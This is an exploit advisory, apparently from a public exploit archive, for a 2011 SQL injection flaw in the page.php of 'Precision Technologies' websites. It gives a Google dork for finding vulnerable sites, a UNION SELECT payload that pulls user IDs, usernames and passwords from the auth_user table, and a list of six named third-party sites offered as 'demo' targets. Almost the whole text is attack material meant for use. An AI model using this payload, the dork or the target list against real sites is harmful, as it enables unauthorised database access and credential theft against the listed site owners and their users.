# Exploit Title:Precision Technologies(page.php)sql Injection Vulnerability # Date: 17/8/2011 # Author: Angel Injection # home Page: http://www.club-h.co.cc , http://www.sec-krb.org # Email: Angel-Injection[at]hotmail.com # Vendor or Software Link: http://www.pretechno.com # Version: N/A # Category:: webapps # Google dork: intext:"powered by Precision Technologies" inurl:"page.php?id=" # Tested on: Back Track 5 >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> Exploit http://localhost/page.php?id=1' http://localhost/page.php?id=1[injection here] http://www.localhost/page.php?id=-1+union+select+1,2,3,concat(uid,0x3a,username,0x3a,password),5,6,7,8,9,10+from+auth_user-- Demo sites http://www.cibmrd.com/page.php?id=%27 http://www.nirmaltours.com/page.php?id=1%27 http://prakritiwomen.org/page.php?id=1 http://www.cardicareaipc.com/page.php?id=1%27 http://www.opaquegroup.com/page.php?id=1%27 http://synergy-pune.com/page.php?id=1%27 -- ------ ---------- ----------- ------- ------------- ------- --------- ------ ---- Thanks to all the people of Iraq And Club Hack Team